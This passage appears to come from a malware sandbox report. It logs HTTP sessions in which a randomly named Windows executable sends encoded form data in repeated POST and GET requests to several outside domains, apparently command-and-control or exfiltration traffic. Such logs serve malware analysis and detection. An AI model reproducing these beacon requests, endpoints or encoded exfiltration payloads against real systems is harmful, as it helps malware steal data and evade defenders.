server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49905	146.88.233.115	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:51.657730103 CET	1757	OUT	POST /rwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.smartcongress.net Origin: http://www.smartcongress.net Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.smartcongress.net/rwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 67 57 70 71 57 64 79 35 42 43 44 6a 41 45 35 51 47 36 32 79 73 41 4b 52 67 56 33 52 4c 71 4b 75 55 55 41 4f 38 70 6b 35 30 35 39 46 68 33 41 5a 66 6a 30 4a 71 4f 51 6d 52 72 49 4f 75 7a 67 66 66 59 4e 33 31 77 63 4c 53 6c 61 6c 69 38 68 34 37 35 70 55 37 6a 37 56 6c 54 46 53 4a 46 48 65 5a 75 2f 55 2f 75 63 35 62 64 61 47 75 6b 33 53 31 30 39 77 2f 2f 50 45 30 41 41 74 75 66 72 6e 76 43 48 54 76 52 78 34 32 64 76 33 44 6d 55 4e 58 79 78 56 53 53 33 48 38 4e 31 65 6c 77 38 7a 4f 65 4c 33 69 4d 78 32 48 6e 4e 4b 61 52 6e 6a 4b 75 74 5a 44 79 6e 4c 47 6a 72 4e 72 56 6b 6b 4d 64 48 33 77 2b 6f 56 30 79 45 54 44 61 66 50 64 46 4a 44 71 6e 6d 6b 70 44 64 4b 39 5a 67 4a 41 55 6f 35 72 44 73 71 79 52 53 39 58 62 70 67 65 33 4e 37 68 52 48 6e 53 41 70 47 56 7a 2f 54 30 45 7a 2b 4e 67 6f 38 4f 6c 41 58 63 69 39 30 55 57 65 36 50 74 6d 75 50 56 52 6a 41 57 2f 6f 51 56 77 4f 53 4b 72 33 62 34 5a 6b 6f 75 4e 36 45 59 65 59 4d 56 38 45 51 2f 6d 42 4e 4c 43 47 56 62 6b 48 6f 65 4b 45 2f 2f [TRUNCATED] Data Ascii: QzmLxn8=gWpqWdy5BCDjAE5QG62ysAKRgV3RLqKuUUAO8pk5059Fh3AZfj0JqOQmRrIOuzgffYN31wcLSlali8h475pU7j7VlTFSJFHeZu/U/uc5bdaGuk3S109w//PE0AAtufrnvCHTvRx42dv3DmUNXyxVSS3H8N1elw8zOeL3iMx2HnNKaRnjKutZDynLGjrNrVkkMdH3w+oV0yETDafPdFJDqnmkpDdK9ZgJAUo5rDsqyRS9Xbpge3N7hRHnSApGVz/T0Ez+Ngo8OlAXci90UWe6PtmuPVRjAW/oQVwOSKr3b4ZkouN6EYeYMV8EQ/mBNLCGVbkHoeKE//XEQiShtDt8nCOkuNTaXPzkCK5rxjneg4TJhfN68Ac4IPq9qtA49ZuAwnedQKdPHdG8deCxZOjJ5HTIjrGjtzKrGOv5nPTuEj8CmQvwTtiG3JlW4KiP4lYOXxAKR4TStWgatMPrt6Y8+3uJukqDh5NWUgqv6+C+Cvy30x1J5lr97i35gnoytM41w8Bz0L/z3UglxlMSOwYwY3/cAxRQ628eSulxp7P6jd8lYEVAWju7jRxfWPaetIfJhoDc/m91RUJNDDBmNFuI+TTxPfN62lGinnH/gGRokBh4fgPlaxrtNAWraNnc4sO81tUlepPueJ91jMRJ/cTaNa07n2WER9FSClmcVT/nuWawbkR74mB8439aM8Jh8Vvx2jTccNsY5+qiSW4CZD6VzKFtbE7LpBKY+pwqLVNInUfpeHr1/8eobpUp37A/KH7G2KOAF0vdTiQqsyJVUNKDsPdXmNllgAcToUhsm+dmPYEQn+LXaWGmRDHDvT2vPKSdH0iVij0dYXk0g/7U6wa7M45ShPfM6huV/h3o/DcjtLSTdorRI4uKyXYS4AW2XxHAYbzRRpmfPXmv+YkZhh3WN+ACwvdyQ3N/8eqaInuU2lOmxUumz+fWLWD+ja1Qu76CPYgryN5Jq4YQL1V0YHWKzw7pOyoyiOtoxHSs2wu7dB55 [TRUNCATED]
Jan 10, 2025 19:56:52.294718981 CET	380	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Fri, 10 Jan 2025 18:56:52 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49923	146.88.233.115	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:54.199975014 CET	448	OUT	GET /rwyw/?QzmLxn8=tUBKVtCXMBuJNHIpFqiFgzGd5gfnYoalLGMy8MAQ+Jhmg3oHbxgD99VhXdh+qXtYYooesRAVLXyHvMNOjYpU7DvvjDJcGU7DA+zjkrEkOcvVml7XwTJpjMjN9RU0yceV1A==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.smartcongress.net Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:56:54.818375111 CET	380	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Fri, 10 Jan 2025 18:56:54 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49960	85.159.66.93	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:00.208782911 CET	702	OUT	POST /gae2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.duyordu.xyz Origin: http://www.duyordu.xyz Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.duyordu.xyz/gae2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 6c 76 45 4d 33 64 44 37 4a 57 37 6c 70 32 6c 5a 47 61 55 4a 76 36 35 50 73 31 30 74 61 4c 4b 56 50 4a 57 6d 79 53 68 47 6b 43 4a 32 5a 71 33 56 7a 47 48 66 2b 6d 51 49 55 57 51 6a 30 37 6f 4b 72 58 74 6f 6f 2f 43 42 34 5a 51 55 64 68 52 79 4b 38 45 67 69 59 4e 76 4b 6d 37 64 57 78 43 61 46 42 30 6b 50 48 6a 33 56 71 47 5a 4a 71 36 43 55 55 6e 63 37 51 5a 68 75 57 67 6f 33 45 72 4c 55 66 35 48 33 73 76 52 5a 33 50 6c 31 4b 33 6a 65 49 4a 4d 45 41 38 4b 79 63 4e 33 6b 4c 61 62 65 67 6f 75 34 64 42 74 6c 6a 76 53 37 78 4d 55 4c 56 61 4d 71 75 73 53 69 4e 2b 35 42 6e 46 65 4e 4a 5a 4e 53 2b 59 3d Data Ascii: QzmLxn8=lvEM3dD7JW7lp2lZGaUJv65Ps10taLKVPJWmyShGkCJ2Zq3VzGHf+mQIUWQj07oKrXtoo/CB4ZQUdhRyK8EgiYNvKm7dWxCaFB0kPHj3VqGZJq6CUUnc7QZhuWgo3ErLUf5H3svRZ3Pl1K3jeIJMEA8KycN3kLabegou4dBtljvS7xMULVaMqusSiN+5BnFeNJZNS+Y=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49976	85.159.66.93	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:02.786247969 CET	722	OUT	POST /gae2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.duyordu.xyz Origin: http://www.duyordu.xyz Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.duyordu.xyz/gae2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 6c 76 45 4d 33 64 44 37 4a 57 37 6c 6f 55 78 5a 46 35 38 4a 34 4b 35 4d 67 56 30 74 55 72 4b 52 50 4a 61 6d 79 57 78 57 6a 77 74 32 5a 49 2f 56 79 46 66 66 2f 6d 51 49 4d 47 51 6d 36 62 6f 42 72 57 52 4b 6f 36 36 42 34 5a 45 55 64 67 68 79 4b 50 38 76 6a 49 4e 74 66 32 37 54 62 52 43 61 46 42 30 6b 50 44 43 73 56 71 65 5a 49 5a 79 43 57 31 6e 66 6e 41 5a 67 6d 32 67 6f 7a 45 72 31 55 66 35 35 33 74 7a 33 5a 78 4c 6c 31 4b 6e 6a 51 39 70 4c 64 51 38 49 32 63 4d 30 67 6f 6a 4c 47 78 34 36 2b 72 4e 4d 70 42 37 75 33 6e 39 2b 52 33 53 4b 70 75 45 35 69 4f 57 50 45 51 59 32 58 71 4a 39 4d 70 50 5a 6e 65 64 57 6d 66 33 54 64 2f 78 76 2b 47 4c 53 49 41 32 47 Data Ascii: QzmLxn8=lvEM3dD7JW7loUxZF58J4K5MgV0tUrKRPJamyWxWjwt2ZI/VyFff/mQIMGQm6boBrWRKo66B4ZEUdghyKP8vjINtf27TbRCaFB0kPDCsVqeZIZyCW1nfnAZgm2gozEr1Uf553tz3ZxLl1KnjQ9pLdQ8I2cM0gojLGx46+rNMpB7u3n9+R3SKpuE5iOWPEQY2XqJ9MpPZnedWmf3Td/xv+GLSIA2G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49992	85.159.66.93	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:05.329797983 CET	1739	OUT	POST /gae2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.duyordu.xyz Origin: http://www.duyordu.xyz Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.duyordu.xyz/gae2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 6c 76 45 4d 33 64 44 37 4a 57 37 6c 6f 55 78 5a 46 35 38 4a 34 4b 35 4d 67 56 30 74 55 72 4b 52 50 4a 61 6d 79 57 78 57 6a 77 6c 32 5a 39 72 56 39 45 66 66 38 6d 51 49 53 57 51 6e 36 62 6f 41 72 58 35 4f 6f 37 47 2f 34 66 49 55 4d 79 70 79 4d 2b 38 76 71 49 4e 74 41 47 37 53 57 78 44 59 46 42 6c 4d 50 48 6d 73 56 71 65 5a 49 66 57 43 53 6b 6e 66 6c 41 5a 68 75 57 67 6b 33 45 72 4f 55 66 51 43 33 74 6d 4d 61 43 44 6c 31 71 58 6a 63 70 4a 4c 43 41 38 77 78 63 4d 57 67 70 65 52 47 78 6c 42 2b 72 52 71 70 44 62 75 30 44 41 43 4b 44 53 50 33 73 41 65 6a 66 6d 57 4c 41 73 5a 5a 34 64 6f 44 4a 72 65 6c 71 52 64 6d 4e 76 61 66 34 67 59 71 48 48 56 4f 31 33 32 39 4f 48 56 51 73 51 41 31 2f 70 75 54 50 33 31 37 58 59 61 39 74 39 42 63 5a 70 63 72 6e 51 72 6c 45 48 78 30 42 33 64 4d 39 64 53 30 69 4e 76 4e 35 70 55 74 63 55 77 2f 77 61 4e 57 7a 46 79 32 57 52 6b 66 2f 2f 43 76 66 72 37 79 56 32 78 5a 63 4a 62 43 70 4c 44 79 51 76 66 44 39 6b 43 34 33 4c 77 4b 46 51 37 42 30 5a 54 6e 33 [TRUNCATED] Data Ascii: QzmLxn8=lvEM3dD7JW7loUxZF58J4K5MgV0tUrKRPJamyWxWjwl2Z9rV9Eff8mQISWQn6boArX5Oo7G/4fIUMypyM+8vqINtAG7SWxDYFBlMPHmsVqeZIfWCSknflAZhuWgk3ErOUfQC3tmMaCDl1qXjcpJLCA8wxcMWgpeRGxlB+rRqpDbu0DACKDSP3sAejfmWLAsZZ4doDJrelqRdmNvaf4gYqHHVO1329OHVQsQA1/puTP317XYa9t9BcZpcrnQrlEHx0B3dM9dS0iNvN5pUtcUw/waNWzFy2WRkf//Cvfr7yV2xZcJbCpLDyQvfD9kC43LwKFQ7B0ZTn3fBxNetXHEN4Ndu6ForFKB40RazJWQH1l4vSDQ8JHue3SJxwfufoCgYY8scn1JTZpD0+T2cHVMzOPdHQF2UADlJSEYYMX6Lnj9+KJskdE20jWYC7rekVCNf7LxYH7EyYqxZRGRCxRMcqNzZ/uteMdjSp1WNwUNKf1DFD8koXjqyTdNUhaLya4m0979EZl439bwXZ/L0AOeMnzMSdQBcAKzi+3tFLPcAixr2Nw9kqweYGMCe+ikzRX8oTGgVGZgJ44xagOtUX+hkZNVwunwYkmuO1ygGjeFhEi8+cRM4UhiNjnxTzbDkCEQNrA3bc92iFvCkKG9IcrffN98Ya1deXyZueaKwOo7t1HH8LR0xC2ASXgifj6+8CJu2HX/qGqQ/x/Gb0ITt2Pg1FQ4r29CYqoXbD5GYpe25Z/GVSrMY1yxIh0PoWlnceUCoLvSoG3f3owH7wMjodikKEpynjVBvBtt6/ieAgUsLwFUzaF3zNooCxRplNmUqnCh+c/IIUgcBrlWnY4Fqg32eLHWqPvN0tmbFllMfnERRLdZ1KgAEj8G665avan1Fxec9x2pxKYuAVqltWuL56xVDAvoLZtxWUVURRzY0JqUMBsSXtLKR/c5B97wyNkb53ub6Ywar5Fn5tFb5EcPvH/SMi1T+kYZKly4eBE6R5SWBx2Hi [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49995	85.159.66.93	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:07.869687080 CET	442	OUT	GET /gae2/?nbd8Y=hfD0&QzmLxn8=otss0rWhIHnhk11bHpADtP94ljsZH/GQRLn65mx6qQBII5Hy/33+pU4ua28O/MN/hGVNt5jqk6AiUDpzXtwsnMZeIw/tUiqDcE1HIDKqYpe8NoemdkbdmjFvjmoOl2KsKw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.duyordu.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:57:08.580559015 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 10 Jan 2025 18:57:08 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-10T18:57:13.4664292Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49996	104.21.7.187	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:14.083796024 CET	702	OUT	POST /9nv0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.gk88top.top Origin: http://www.gk88top.top Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.gk88top.top/9nv0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 51 55 49 58 42 4e 6d 41 72 70 48 71 45 73 6b 54 2f 6a 4a 69 2f 74 57 69 43 32 62 6c 47 55 70 56 2b 4d 5a 30 65 49 7a 6d 42 2b 39 72 42 34 39 4c 76 42 46 37 4d 52 34 6b 55 67 43 79 62 75 51 2b 45 71 55 78 64 63 39 35 4d 6b 59 6f 57 6c 6e 70 4b 4d 48 78 79 64 34 39 4d 51 6f 62 54 51 30 4a 68 69 32 61 45 47 37 64 79 77 44 7a 71 4e 2b 36 45 6f 4e 39 49 64 6e 42 59 59 42 4e 63 71 75 4e 74 66 71 34 76 2f 47 6e 6a 47 50 7a 6e 54 6c 53 57 7a 78 55 65 30 70 7a 49 43 56 30 41 78 42 45 77 2b 71 74 75 4c 68 37 42 73 65 4f 46 77 46 65 34 35 4a 72 71 33 79 33 57 53 72 4b 79 42 46 32 66 4b 76 59 34 5a 41 3d Data Ascii: QzmLxn8=QUIXBNmArpHqEskT/jJi/tWiC2blGUpV+MZ0eIzmB+9rB49LvBF7MR4kUgCybuQ+EqUxdc95MkYoWlnpKMHxyd49MQobTQ0Jhi2aEG7dywDzqN+6EoN9IdnBYYBNcquNtfq4v/GnjGPznTlSWzxUe0pzICV0AxBEw+qtuLh7BseOFwFe45Jrq3y3WSrKyBF2fKvY4ZA=
Jan 10, 2025 19:57:15.095706940 CET	911	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yc9rRVLoql5pphDcyYNEAPr48UnhYDEC8dpzCVKQQPzxevHcCX5G%2B0jqoeiGQ5gonB9KR2yevPK%2B9Fp7mdt%2BKOJ5%2B0zs16bnmZx6SNippPWms8DwU3c4eCIbvuytbsaRdW8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffee441790218cc-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49997	104.21.7.187	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:16.641395092 CET	722	OUT	POST /9nv0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.gk88top.top Origin: http://www.gk88top.top Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.gk88top.top/9nv0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 51 55 49 58 42 4e 6d 41 72 70 48 71 46 4d 30 54 2b 46 42 69 36 4e 57 68 63 47 62 6c 50 30 70 5a 2b 4d 46 30 65 4a 48 32 42 73 70 72 43 64 42 4c 31 44 39 37 4a 52 34 6b 48 67 43 33 57 4f 51 6c 45 72 6f 50 64 5a 39 35 4d 6b 38 6f 57 68 6a 70 4e 2f 76 75 7a 4e 34 37 58 67 6f 56 4f 67 30 4a 68 69 32 61 45 47 2f 33 79 77 62 7a 71 39 75 36 45 4b 6c 2b 57 74 6e 43 49 49 42 4e 4c 36 76 4b 74 66 72 74 76 37 47 4e 6a 41 4c 7a 6e 57 4a 53 54 32 4e 58 46 45 70 70 4d 43 55 43 45 7a 51 57 79 5a 53 34 74 72 4a 4a 4a 39 57 4b 4a 6d 30 30 69 62 42 74 70 33 61 63 57 52 44 38 33 32 59 65 46 70 2f 6f 6d 4f 55 4d 4c 42 38 41 68 35 57 4f 58 48 5a 31 43 6f 41 68 42 2f 32 46 Data Ascii: QzmLxn8=QUIXBNmArpHqFM0T+FBi6NWhcGblP0pZ+MF0eJH2BsprCdBL1D97JR4kHgC3WOQlEroPdZ95Mk8oWhjpN/vuzN47XgoVOg0Jhi2aEG/3ywbzq9u6EKl+WtnCIIBNL6vKtfrtv7GNjALznWJST2NXFEppMCUCEzQWyZS4trJJJ9WKJm00ibBtp3acWRD832YeFp/omOUMLB8Ah5WOXHZ1CoAhB/2F
Jan 10, 2025 19:57:17.678128004 CET	915	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNL3Kzuy55azJl2LYzroo5Qlt7d6FSgA8DJ8uuT4i1WZdhygk%2FlW9FqG%2BYaVYXGzkDbYh1l6YE0EUx3j%2BrotzxSAP6XQFXlkNF8AEUbmmuWls%2B3r7Io%2BxkKhunoQz2cvci8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffee4517c450f78-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1632&rtt_var=816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49998	104.21.7.187	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:19.188211918 CET	1739	OUT	POST /9nv0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.gk88top.top Origin: http://www.gk88top.top Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.gk88top.top/9nv0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 51 55 49 58 42 4e 6d 41 72 70 48 71 46 4d 30 54 2b 46 42 69 36 4e 57 68 63 47 62 6c 50 30 70 5a 2b 4d 46 30 65 4a 48 32 42 73 78 72 42 72 56 4c 76 6b 52 37 4f 52 34 6b 63 41 43 32 57 4f 52 33 45 71 41 44 64 5a 42 50 4d 6d 55 6f 57 43 72 70 49 4f 76 75 36 4e 34 37 49 51 6f 55 54 51 30 6d 68 69 47 57 45 47 50 33 79 77 62 7a 71 37 71 36 4e 34 4e 2b 55 74 6e 42 59 59 42 42 63 71 75 74 74 62 47 61 76 37 4b 33 6a 77 72 7a 6b 33 6c 53 55 55 6c 58 4a 45 70 33 4c 43 55 4b 45 7a 64 49 79 5a 6e 57 74 72 4d 55 4a 36 61 4b 4e 79 55 73 32 4a 78 48 36 68 57 57 4f 44 2b 65 7a 56 30 66 61 50 76 53 74 66 77 73 63 45 73 4e 76 2f 4f 77 58 6c 38 77 57 38 49 6f 51 50 58 52 43 6d 77 32 73 32 4b 66 62 58 71 79 4e 61 37 42 37 73 51 45 79 2b 4c 5a 77 69 66 4d 34 34 35 6a 6c 52 45 6e 48 4d 72 4f 4f 66 4b 4e 74 35 62 4d 71 6d 48 4f 6b 6d 78 42 76 76 68 45 63 30 4a 4b 6b 4a 38 42 4f 53 74 77 31 68 6e 4b 75 70 5a 63 70 2b 38 58 78 63 32 75 6e 32 4d 73 7a 53 59 55 71 6c 36 41 4f 73 4b 76 44 6e 68 2b 57 56 [TRUNCATED] Data Ascii: 